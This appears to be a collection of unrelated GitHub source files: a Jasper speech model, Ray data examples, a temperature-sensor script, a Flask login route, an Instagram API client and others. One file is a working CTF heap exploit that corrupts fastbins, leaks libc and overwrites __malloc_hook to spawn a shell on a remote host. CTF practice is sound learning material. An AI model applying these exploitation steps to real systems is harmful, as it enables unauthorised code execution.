in_channels = in_channels[-1]
else:
self.identity_block = mask_conv1d1_block(
in_channels=in_channels,
out_channels=out_channels,
bn_eps=bn_eps,
dropout_rate=0.0,
activation=None,
data_format=data_format,
name="identity_block")
self.body = DualPathSequential(name="body")
for i in range(repeat):
activation = "relu" if i < repeat - 1 else None
dropout_rate_i = dropout_rate if i < repeat - 1 else 0.0
self.body.add(block_class(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=1,
padding=(kernel_size // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rate_i,
activation=activation,
data_format=data_format,
name="block{}".format(i + 1)))
in_channels = out_channels
self.activ = nn.ReLU()
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
if self.use_dr:
            x_len, y, y_len = x_len if isinstance(x_len, tuple) else (x_len, None, None)
y = [x] if y is None else y + [x]
y_len = [x_len] if y_len is None else y_len + [x_len]
identity, _ = self.identity_block(y, y_len, training=training)
identity = tf.stack(identity, axis=1)
identity = tf.math.reduce_sum(identity, axis=1)
else:
identity, _ = self.identity_block(x, x_len, training=training)
x, x_len = self.body(x, x_len, training=training)
x = x + identity
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
if self.use_dr:
return x, (x_len, y, y_len)
else:
return x, x_len
class JasperFinalBlock(nn.Layer):
"""
Jasper specific final block.
Parameters:
----------
in_channels : int
Number of input channels.
channels : list of int
Number of output channels for each block.
kernel_sizes : list of int
Kernel sizes for each block.
bn_eps : float
Small float added to variance in Batch norm.
    dropout_rates : list of float
Dropout rates for each block.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
channels,
kernel_sizes,
bn_eps,
dropout_rates,
use_dw,
use_dr,
data_format="channels_last",
**kwargs):
super(JasperFinalBlock, self).__init__(**kwargs)
self.use_dr = use_dr
conv1_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
self.conv1 = conv1_class(
in_channels=in_channels,
out_channels=channels[-2],
kernel_size=kernel_sizes[-2],
strides=1,
padding=(2 * kernel_sizes[-2] // 2 - 1),
dilation=2,
bn_eps=bn_eps,
dropout_rate=dropout_rates[-2],
data_format=data_format,
name="conv1")
self.conv2 = MaskConvBlock1d(
in_channels=channels[-2],
out_channels=channels[-1],
kernel_size=kernel_sizes[-1],
strides=1,
padding=(kernel_sizes[-1] // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rates[-1],
data_format=data_format,
name="conv2")
def call(self, x, x_len, training=None):
if self.use_dr:
x_len = x_len[0]
x, x_len = self.conv1(x, x_len, training=training)
x, x_len = self.conv2(x, x_len, training=training)
return x, x_len
class Jasper(tf.keras.Model):
"""
Jasper/DR/QuartzNet model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
channels : list of int
Number of output channels for each unit and initial/final block.
kernel_sizes : list of int
Kernel sizes for each unit and initial/final block.
bn_eps : float
Small float added to variance in Batch norm.
    dropout_rates : list of float
Dropout rates for each unit and initial/final block.
repeat : int
Count of body convolution blocks.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
in_channels : int, default 64
Number of input channels (audio features).
classes : int, default 29
Number of classification classes (number of graphemes).
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
channels,
kernel_sizes,
bn_eps,
dropout_rates,
repeat,
use_dw,
use_dr,
in_channels=64,
classes=29,
data_format="channels_last",
**kwargs):
super(Jasper, self).__init__(**kwargs)
self.in_size = None
self.in_channels = in_channels
self.classes = classes
self.data_format = data_format
self.features = DualPathSequential(name="features")
init_block_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
self.features.add(init_block_class(
in_channels=in_channels,
out_channels=channels[0],
kernel_size=kernel_sizes[0],
strides=2,
padding=(kernel_sizes[0] // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rates[0],
data_format=data_format,
name="init_block"))
in_channels = channels[0]
in_channels_list = []
for i, (out_channels, kernel_size, dropout_rate) in \
enumerate(zip(channels[1:-2], kernel_sizes[1:-2], dropout_rates[1:-2])):
in_channels_list += [in_channels]
self.features.add(JasperUnit(
in_channels=(in_channels_list if use_dr else in_channels),
out_channels=out_channels,
kernel_size=kernel_size,
bn_eps=bn_eps,
dropout_rate=dropout_rate,
repeat=repeat,
use_dw=use_dw,
use_dr=use_dr,
data_format=data_format,
name="unit{}".format(i + 1)))
in_channels = out_channels
self.features.add(JasperFinalBlock(
in_channels=in_channels,
channels=channels,
kernel_sizes=kernel_sizes,
bn_eps=bn_eps,
dropout_rates=dropout_rates,
use_dw=use_dw,
use_dr=use_dr,
data_format=data_format,
name="final_block"))
in_channels = channels[-1]
self.output1 = conv1d1(
in_channels=in_channels,
out_channels=classes,
use_bias=True,
data_format=data_format,
name="output1")
def call(self, x, x_len, training=None):
x, x_len = self.features(x, x_len, training=training)
x = self.output1(x)
return x, x_len
def get_jasper(version,
use_dw=False,
use_dr=False,
bn_eps=1e-3,
model_name=None,
pretrained=False,
root=os.path.join("~", ".tensorflow", "models"),
**kwargs):
"""
Create Jasper/DR/QuartzNet model with specific parameters.
Parameters:
----------
version : tuple of str
Model type and configuration.
use_dw : bool, default False
Whether to use depthwise block.
use_dr : bool, default False
Whether to use dense residual scheme.
bn_eps : float, default 1e-3
Small float added to variance in Batch norm.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
import numpy as np
blocks, repeat = tuple(map(int, version[1].split("x")))
main_stage_repeat = blocks // 5
model_type = version[0]
if model_type == "jasper":
channels_per_stage = [256, 256, 384, 512, 640, 768, 896, 1024]
kernel_sizes_per_stage = [11, 11, 13, 17, 21, 25, 29, 1]
dropout_rates_per_stage = [0.2, 0.2, 0.2, 0.2, 0.3, 0.3, 0.4, 0.4]
elif model_type == "quartznet":
channels_per_stage = [256, 256, 256, 512, 512, 512, 512, 1024]
kernel_sizes_per_stage = [33, 33, 39, 51, 63, 75, 87, 1]
dropout_rates_per_stage = [0.0] * 8
else:
raise ValueError("Unsupported Jasper family model type: {}".format(model_type))
stage_repeat = np.full((8,), 1)
stage_repeat[1:-2] *= main_stage_repeat
channels = sum([[a] * r for (a, r) in zip(channels_per_stage, stage_repeat)], [])
kernel_sizes = sum([[a] * r for (a, r) in zip(kernel_sizes_per_stage, stage_repeat)], [])
dropout_rates = sum([[a] * r for (a, r) in zip(dropout_rates_per_stage, stage_repeat)], [])
net = Jasper(
channels=channels,
kernel_sizes=kernel_sizes,
bn_eps=bn_eps,
dropout_rates=dropout_rates,
repeat=repeat,
use_dw=use_dw,
use_dr=use_dr,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
in_channels = kwargs["in_channels"] if ("in_channels" in kwargs) else 3
input_shape = (1,) + (in_channels,) + net.in_size if net.data_format == "channels_first" else\
(1,) + net.in_size + (in_channels,)
net.build(input_shape=input_shape)
net.load_weights(
filepath=get_model_file(
model_name=model_name,
local_model_store_dir_path=root))
return net
def jasper5x3(**kwargs):
"""
Jasper 5x3 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "5x3"), model_name="jasper5x3", **kwargs)
def jasper10x4(**kwargs):
"""
Jasper 10x4 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "10x4"), model_name="jasper10x4", **kwargs)
def jasper10x5(**kwargs):
"""
Jasper 10x5 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "10x5"), model_name="jasper10x5", **kwargs)
def _test():
import numpy as np
import tensorflow.keras.backend as K
# data_format = "channels_last"
data_format = "channels_first"
pretrained = False
audio_features = 64
classes = 29
models = [
jasper5x3,
jasper10x4,
jasper10x5,
]
for model in models:
net = model(
in_channels=audio_features,
classes=classes,
pretrained=pretrained,
data_format=data_format)
batch = 3
seq_len = np.random.randint(60, 150)
# seq_len = 90
x = tf.random.normal((batch, audio_features, seq_len) if is_channels_first(data_format) else
(batch, seq_len, audio_features))
        x_len = tf.convert_to_tensor(np.array([seq_len - 2], dtype=np.int64))  # np.long no longer exists in NumPy
y, y_len = net(x, x_len)
assert (y.shape.as_list()[0] == batch)
if is_channels_first(data_format):
assert (y.shape.as_list()[1] == classes)
assert (y.shape.as_list()[2] in [seq_len // 2, seq_len // 2 + 1])
else:
assert (y.shape.as_list()[1] in [seq_len // 2, seq_len // 2 + 1])
assert (y.shape.as_list()[2] == classes)
weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != jasper5x3 or weight_count == 107681053)
assert (model != jasper10x4 or weight_count == 261393693)
assert (model != jasper10x5 or weight_count == 322286877)
if __name__ == "__main__":
_test()
|
[
"osemery@gmail.com"
] |
osemery@gmail.com
|
bf0ab1c5d71cbb173fe840a0b6c59b8c19cfc5e2
|
ad0e853db635edc578d58891b90f8e45a72a724f
|
/doc/source/data/doc_code/batch_formats.py
|
2099f70e9bb80050091134df790645f849ed25d4
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
ericl/ray
|
8c93fc713af3b753215d4fe6221278700936e2db
|
e9a1c6d814fb1a81033809f56695030d651388f5
|
refs/heads/master
| 2023-08-31T11:53:23.584855
| 2023-06-07T21:04:28
| 2023-06-07T21:04:28
| 91,077,004
| 2
| 4
|
Apache-2.0
| 2023-01-11T17:19:10
| 2017-05-12T09:51:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
# flake8: noqa
# isort: skip_file
# fmt: off
# __simple_map_function_start__
import ray
ds = ray.data.read_csv("example://iris.csv")
def map_function(data):
return data[data["sepal.length"] < 5]
batch = ds.take_batch(10, batch_format="pandas")
mapped_batch = map_function(batch)
transformed = ds.map_batches(map_function, batch_format="pandas", batch_size=10)
# __simple_map_function_end__
# __simple_pandas_start__
import ray
import pandas as pd
ds = ray.data.read_csv("example://iris.csv")
ds.show(1)
# -> {'sepal.length': 5.1, ..., 'petal.width': 0.2, 'variety': 'Setosa'}
def transform_pandas(df_batch: pd.DataFrame) -> pd.DataFrame:
df_batch = df_batch[df_batch["variety"] == "Versicolor"]
df_batch.loc[:, "normalized.sepal.length"] = df_batch["sepal.length"] / df_batch["sepal.length"].max()
df_batch = df_batch.drop(columns=["sepal.length"])
return df_batch
ds.map_batches(transform_pandas, batch_format="pandas").show(1)
# -> {..., 'variety': 'Versicolor', 'normalized.sepal.length': 1.0}
# __simple_pandas_end__
# __simple_numpy_start__
from typing import Dict
import ray
import numpy as np
ds = ray.data.range_tensor(1000, shape=(2, 2))
def transform_numpy(arr: Dict[str, np.ndarray]) -> Dict[str, np.ndarray]:
arr["data"] = arr["data"] * 2
return arr
# test map function on a batch
batch = ds.take_batch(1)
mapped_batch = transform_numpy(batch)
ds.map_batches(transform_numpy)
# __simple_numpy_end__
# __simple_pyarrow_start__
import ray
import pyarrow as pa
import pyarrow.compute as pac
ds = ray.data.read_csv("example://iris.csv")
def transform_pyarrow(batch: pa.Table) -> pa.Table:
batch = batch.filter(pac.equal(batch["variety"], "Versicolor"))
return batch.drop(["sepal.length"])
# test map function on a batch
batch = ds.take_batch(1, batch_format="pyarrow")
mapped_batch = transform_pyarrow(batch)
ds.map_batches(transform_pyarrow, batch_format="pyarrow").show(1)
# -> {'sepal.width': 3.2, ..., 'variety': 'Versicolor'}
# __simple_pyarrow_end__
# fmt: on
|
[
"noreply@github.com"
] |
ericl.noreply@github.com
|
0080d6e109e103ff474bb678c4ce0d6365a10f90
|
0b2ae73bd91d843deb193d79b7c4eb02e900e851
|
/ADT75.py
|
b3bb7d6f5b3c37d352bc8f837b284d4d87f64082
|
[] |
no_license
|
ncdcommunity/Raspberry_pi_ADT75_Temperature_Sensor_Python_Library
|
c495d8db53f3d87585ab8a3eac883ede5dcd5bb4
|
e42bad0d5e057cf309d06b69b44b62ad4cca1da1
|
refs/heads/master
| 2021-09-05T15:16:24.670890
| 2018-01-29T07:03:01
| 2018-01-29T07:03:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADT75
# This code is designed to work with the ADT75_I2CS I2C Mini Module available from ControlEverything.com.
# https://www.controleverything.com/content/Temperature?sku=ADT75_I2CS#tabs-0-product_tabset-2
import smbus
import time
# Get I2C bus
bus = smbus.SMBus(1)
# I2C Address of the device
ADT75_DEFAULT_ADDRESS = 0x48
# ADT75 Register Map
ADT75_REG_TEMP = 0x00 # Temperature Value
ADT75_REG_CONFIG = 0x01 # Configuration Register
ADT75_REG_THYST = 0x02 # THYST setpoint
ADT75_REG_TOS = 0x03 # TOS setpoint
# ADT75 Configuration Register
ADT75_MODE_NORMAL = 0x00 # Normal Mode
ADT75_MODE_ONESHOT = 0x20 # One-Shot Mode
ADT75_FAULTQUEUE_1 = 0x00 # Fault Queue = 1
ADT75_FAULTQUEUE_2 = 0x08 # Fault Queue = 2
ADT75_FAULTQUEUE_4 = 0x10 # Fault Queue = 4
ADT75_FAULTQUEUE_6 = 0x18 # Fault Queue = 6
ADT75_MODE_CMP = 0x00 # Comparator Mode
ADT75_MODE_INT = 0x02 # Interrupt Mode
ADT75_MODE_SHUTDOWN = 0x01 # Shutdown Mode
class ADT75():
def __init__(self):
self.temp_configuration()
def temp_configuration(self):
"""Select the temperature configuration from the given provided values"""
TEMP_CONFIG = (ADT75_MODE_NORMAL | ADT75_FAULTQUEUE_1 | ADT75_MODE_CMP)
bus.write_byte_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_CONFIG, TEMP_CONFIG)
def read_temp(self):
"""Read data back from ADT75_REG_TEMP(0x00), 2 bytes, temp MSB, temp LSB"""
data = bus.read_i2c_block_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_TEMP, 2)
# Convert the data to 12-bits
temp = ((data[0] * 256) + data[1]) / 16
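        # readings above 2047 are negative: 12-bit two's complement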
if temp > 2047 :
temp -= 4096
cTemp = temp * 0.0625
fTemp = (cTemp * 1.8) + 32
return {'c' : cTemp, 'f' : fTemp}
adt75 = ADT75()
while True:
    temp = adt75.read_temp()
    print("Temperature in Celsius : %.2f C" % temp['c'])
    print("Temperature in Fahrenheit : %.2f F" % temp['f'])
    print(" ***************************************** ")
    time.sleep(1)
|
[
"ryker1990@gmail.com"
] |
ryker1990@gmail.com
|
e05e44ea2d5ee7d245bc918ab507c0a29739aaae
|
8692807f1dfa8c18c61df07cfafbbd27d4e66fba
|
/LONG-CHALLENGE/PROXYC.sol.py
|
cead1b911458e67e7b124171a7ef3ddec767cfb8
|
[] |
no_license
|
sharmakajal0/codechef_problems
|
00381e9bf1996b859e46f087c2ffafd9d7a10ef1
|
0b979029e0a821f47fbdd6f9c624daee785a02e7
|
refs/heads/master
| 2020-05-29T15:04:40.459979
| 2020-03-29T08:44:53
| 2020-03-29T08:44:53
| 189,212,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
#!/usr/bin/env python
for _ in range(int(input())):
    D = int(input())
    S = input()
    P = S.count('P')
    # attendances still needed to reach 75% of D days (integer ceiling of 0.75 * D)
    need = (3 * D + 3) // 4 - P
    if need <= 0:
        print(0)
        continue
    # a day can take a proxy if it is not among the first two or last two days,
    # the student was absent, and there is a real 'P' within the two days on
    # each side of it
    markable = 0
    for d in range(2, D - 2):
        if S[d] == 'A' and (S[d - 1] == 'P' or S[d - 2] == 'P') \
                and (S[d + 1] == 'P' or S[d + 2] == 'P'):
            markable += 1
    print(need if markable >= need else -1)
|
[
"sharma.kajal.sitm@gmail.com"
] |
sharma.kajal.sitm@gmail.com
|
c339f9eb2a18aa108c8f03d0636db2b68a387b05
|
487aab917a808b30ebeccf90cd15ed59ac9d776b
|
/Server/app/views/account/auth.py
|
00563a701cf1bf96abd6f713b7d59feb79dee4b7
|
[] |
no_license
|
DSM-DMS/DMS-OpenAPI-Backend
|
62fffc913b5cb562fbca3333223f8abfb2cf2a8a
|
1f0c434e98c4cc5d2150af6f533109b1797d8659
|
refs/heads/master
| 2020-03-20T19:48:56.576943
| 2018-06-18T06:45:05
| 2018-06-18T06:45:05
| 137,655,168
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from flask import Blueprint, Response, request
from flask_jwt_extended import create_access_token, create_refresh_token
from flask_restful import Api
from flasgger import swag_from
from app.docs.account.auth import *
from app.models.account import StudentModel, TokenModel, AccessTokenModel, RefreshTokenModel
from app.views import BaseResource, json_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/student'
@api.resource('/auth')
class Auth(BaseResource):
@json_required({'id': str, 'password': str})
@swag_from(AUTH_POST)
def post(self):
"""
        Student login
"""
payload = request.json
student = StudentModel.objects(id=payload['id'], pw=self.encrypt_password(payload['password'])).first()
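        # issue a JWT access/refresh pair bound to the client's User-Agent,
        # or answer 401 when no student matches the credentials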
return ({
'accessToken': create_access_token(TokenModel.generate_token(AccessTokenModel, student, request.headers['USER-AGENT'])),
'refreshToken': create_refresh_token(TokenModel.generate_token(RefreshTokenModel, student, request.headers['USER-AGENT']))
}, 201) if student else Response('', 401)
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
204b4e459a1699224604a3af5706b1de46d495db
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.TZH/Serif_12/pdf_to_json_test_Latn.TZH_Serif_12.py
|
cd6289fc1d1643cc357cf40015e0694b8ed2d3ee
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TZH/Serif_12/udhr_Latn.TZH_Serif_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
337cee5e29835896cab1957d702d1c6c2b4c4d23
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/de1ctf_2019_weapon/de1ctf_2019_weapon.py
|
b20af85652888221b9c83fe6865667fded000806
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from pwn import *
#libc = ELF('libc-2.23.so')
libc = ELF('libc-2.23.buu.so')
def debug(s):
gdb.attach(p, '''
source ~/libc/loadsym.py
loadsym ~/libc/2.23/64/libc-2.23.debug.so
''' + s)
def alloc(index, size, name):
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', str(size).encode())
p.sendlineafter(b'index: ', str(index).encode())
p.sendafter(b'name:', name)
def delete(index):
p.sendlineafter(b'choice >> ', b'2')
p.sendlineafter(b'idx :', str(index).encode())
def edit(index, name):
p.sendlineafter(b'choice >> ', b'3')
p.sendlineafter(b'idx: ', str(index).encode())
p.sendafter(b'content:', name)
def exploit():
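    # Strategy (inferred from the calls below): fastbin corruption to overlap
    # chunks, point a fastbin entry into _IO_2_1_stdout_ to leak libc, then
    # redirect another fastbin to __malloc_hook and write a one_gadget there.
    # edit(1, b'\xdd\x75') is a partial overwrite that guesses 4 ASLR bits,
    # which is why __main__ retries the whole exploit in a loop.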
alloc(0, 0x20, p64(0) + p64(0x21))
alloc(1, 0x10, b'a')
alloc(2, 0x10, b'a')
    # glibc checks the next chunk's header on free, so write a fake header (0x70, 0x51) first
alloc(3, 0x10, p64(0x70) + p64(0x51))
delete(1)
delete(2)
edit(2, b'\x10')
alloc(1, 0x10, b'a')
alloc(1, 0x10, b'a')
alloc(4 ,0x30, b'a')
alloc(5 ,0x30, b'a')
alloc(6, 0x10, b'a')
edit(0, p64(0) + p64(0x71))
delete(1)
edit(0, p64(0) + p64(0x101))
delete(1)
edit(0, p64(0) + p64(0x71))
edit(1, b'\xdd\x75')
alloc(0, 0x60, b'a')
alloc(0, 0x60, b'a')
alloc(6, 0x60, b'a')
payload = b'a' * ( 0x620 - 0x5ed ) + p64(0xfbad1800) + p64(0) * 3 + b'\x00'
edit(0, payload)
p.recvuntil(b'\x7f')
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 131 - libc.sym['_IO_2_1_stdout_']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc_base + one_gadgets_buu[3]
delete(6)
edit(6, p64(malloc_hook - 0x23))
#context.log_level = 'debug'
alloc(6, 0x60, b'a')
alloc(6, 0x60, b'a' * 0x13 + p64(one))
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', b'1')
p.sendlineafter(b'index: ', b'1')
p.interactive()
if __name__ == '__main__':
flag = False
while not flag:
try:
#p = process('./de1ctf_2019_weapon')
p = remote('node4.buuoj.cn', 25710)
exploit()
flag = True
except:
p.close()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
9e4f89252c66d18fd18e1467a488c675ac89d9bc
|
9e679192c0396ca9dadde55d8e6d3a746c446367
|
/cineBot/lib/python3.6/site-packages/InstagramAPI/InstagramAPI.py
|
27409550b3db4f29318f333c7304c92a51772bd6
|
[
"MIT"
] |
permissive
|
furkanalpereny/cineBot
|
74dfa10e5760f0a2496ca9b8801479d9084d5df7
|
cb93b6fc6ab25ba0601067f54b6824a8462f470d
|
refs/heads/master
| 2022-12-10T10:16:11.006211
| 2019-12-23T04:11:00
| 2019-12-23T04:11:00
| 227,674,856
| 0
| 0
|
MIT
| 2022-12-08T03:19:12
| 2019-12-12T18:50:06
|
Python
|
UTF-8
|
Python
| false
| false
| 53,745
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import random
import json
import hashlib
import hmac
import urllib
import uuid
import time
import copy
import math
import sys
from datetime import datetime
import calendar
import os
from requests_toolbelt import MultipartEncoder
# Turn off InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
try:
from moviepy.editor import VideoFileClip
except:
print("Fail to import moviepy. Need only for Video upload.")
# The urllib library was split into other modules from Python 2 to Python 3
if sys.version_info.major == 3:
import urllib.parse
try:
from ImageUtils import getImageSize
except:
# Issue 159, python3 import fix
from .ImageUtils import getImageSize
class InstagramAPI:
API_URL = 'https://i.instagram.com/api/v1/'
    DEVICE_SETTINGS = {'manufacturer': 'Xiaomi',
'model': 'HM 1SW',
'android_version': 18,
'android_release': '4.3'}
    USER_AGENT = 'Instagram 10.26.0 Android ({android_version}/{android_release}; 320dpi; 720x1280; {manufacturer}; {model}; armani; qcom; en_US)'.format(**DEVICE_SETTINGS)
IG_SIG_KEY = '4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178'
EXPERIMENTS = 'ig_promote_reach_objective_fix_universe,ig_android_universe_video_production,ig_search_client_h1_2017_holdout,ig_android_live_follow_from_comments_universe,ig_android_carousel_non_square_creation,ig_android_live_analytics,ig_android_follow_all_dialog_confirmation_copy,ig_android_stories_server_coverframe,ig_android_video_captions_universe,ig_android_offline_location_feed,ig_android_direct_inbox_retry_seen_state,ig_android_ontact_invite_universe,ig_android_live_broadcast_blacklist,ig_android_insta_video_reconnect_viewers,ig_android_ad_async_ads_universe,ig_android_search_clear_layout_universe,ig_android_shopping_reporting,ig_android_stories_surface_universe,ig_android_verified_comments_universe,ig_android_preload_media_ahead_in_current_reel,android_instagram_prefetch_suggestions_universe,ig_android_reel_viewer_fetch_missing_reels_universe,ig_android_direct_search_share_sheet_universe,ig_android_business_promote_tooltip,ig_android_direct_blue_tab,ig_android_async_network_tweak_universe,ig_android_elevate_main_thread_priority_universe,ig_android_stories_gallery_nux,ig_android_instavideo_remove_nux_comments,ig_video_copyright_whitelist,ig_react_native_inline_insights_with_relay,ig_android_direct_thread_message_animation,ig_android_draw_rainbow_client_universe,ig_android_direct_link_style,ig_android_live_heart_enhancements_universe,ig_android_rtc_reshare,ig_android_preload_item_count_in_reel_viewer_buffer,ig_android_users_bootstrap_service,ig_android_auto_retry_post_mode,ig_android_shopping,ig_android_main_feed_seen_state_dont_send_info_on_tail_load,ig_fbns_preload_default,ig_android_gesture_dismiss_reel_viewer,ig_android_tool_tip,ig_android_ad_logger_funnel_logging_universe,ig_android_gallery_grid_column_count_universe,ig_android_business_new_ads_payment_universe,ig_android_direct_links,ig_android_audience_control,ig_android_live_encore_consumption_settings_universe,ig_perf_android_holdout,ig_android_cache_contact_import_list,ig_android_links_receivers,ig_android_ad_impression_backtest,ig_android_list_redesign,ig_android_stories_separate_overlay_creation,ig_android_stop_video_recording_fix_universe,ig_android_render_video_segmentation,ig_android_live_encore_reel_chaining_universe,ig_android_sync_on_background_enhanced_10_25,ig_android_immersive_viewer,ig_android_mqtt_skywalker,ig_fbns_push,ig_android_ad_watchmore_overlay_universe,ig_android_react_native_universe,ig_android_profile_tabs_redesign_universe,ig_android_live_consumption_abr,ig_android_story_viewer_social_context,ig_android_hide_post_in_feed,ig_android_video_loopcount_int,ig_android_enable_main_feed_reel_tray_preloading,ig_android_camera_upsell_dialog,ig_android_ad_watchbrowse_universe,ig_android_internal_research_settings,ig_android_search_people_tag_universe,ig_android_react_native_ota,ig_android_enable_concurrent_request,ig_android_react_native_stories_grid_view,ig_android_business_stories_inline_insights,ig_android_log_mediacodec_info,ig_android_direct_expiring_media_loading_errors,ig_video_use_sve_universe,ig_android_cold_start_feed_request,ig_android_enable_zero_rating,ig_android_reverse_audio,ig_android_branded_content_three_line_ui_universe,ig_android_live_encore_production_universe,ig_stories_music_sticker,ig_android_stories_teach_gallery_location,ig_android_http_stack_experiment_2017,ig_android_stories_device_tilt,ig_android_pending_request_search_bar,ig_android_fb_topsearch_sgp_fork_request,ig_android_seen_state_with_view_info,ig_android_animation_perf_reporter_timeout,ig_android_new_block_flow,ig_android_sto
ry_tray_title_play_all_v2,ig_android_direct_address_links,ig_android_stories_archive_universe,ig_android_save_collections_cover_photo,ig_android_live_webrtc_livewith_production,ig_android_sign_video_url,ig_android_stories_video_prefetch_kb,ig_android_stories_create_flow_favorites_tooltip,ig_android_live_stop_broadcast_on_404,ig_android_live_viewer_invite_universe,ig_android_promotion_feedback_channel,ig_android_render_iframe_interval,ig_android_accessibility_logging_universe,ig_android_camera_shortcut_universe,ig_android_use_one_cookie_store_per_user_override,ig_profile_holdout_2017_universe,ig_android_stories_server_brushes,ig_android_ad_media_url_logging_universe,ig_android_shopping_tag_nux_text_universe,ig_android_comments_single_reply_universe,ig_android_stories_video_loading_spinner_improvements,ig_android_collections_cache,ig_android_comment_api_spam_universe,ig_android_facebook_twitter_profile_photos,ig_android_shopping_tag_creation_universe,ig_story_camera_reverse_video_experiment,ig_android_direct_bump_selected_recipients,ig_android_ad_cta_haptic_feedback_universe,ig_android_vertical_share_sheet_experiment,ig_android_family_bridge_share,ig_android_search,ig_android_insta_video_consumption_titles,ig_android_stories_gallery_preview_button,ig_android_fb_auth_education,ig_android_camera_universe,ig_android_me_only_universe,ig_android_instavideo_audio_only_mode,ig_android_user_profile_chaining_icon,ig_android_live_video_reactions_consumption_universe,ig_android_stories_hashtag_text,ig_android_post_live_badge_universe,ig_android_swipe_fragment_container,ig_android_search_users_universe,ig_android_live_save_to_camera_roll_universe,ig_creation_growth_holdout,ig_android_sticker_region_tracking,ig_android_unified_inbox,ig_android_live_new_watch_time,ig_android_offline_main_feed_10_11,ig_import_biz_contact_to_page,ig_android_live_encore_consumption_universe,ig_android_experimental_filters,ig_android_search_client_matching_2,ig_android_react_native_inline_insights_v2,ig_android_business_conversion_value_prop_v2,ig_android_redirect_to_low_latency_universe,ig_android_ad_show_new_awr_universe,ig_family_bridges_holdout_universe,ig_android_background_explore_fetch,ig_android_following_follower_social_context,ig_android_video_keep_screen_on,ig_android_ad_leadgen_relay_modern,ig_android_profile_photo_as_media,ig_android_insta_video_consumption_infra,ig_android_ad_watchlead_universe,ig_android_direct_prefetch_direct_story_json,ig_android_shopping_react_native,ig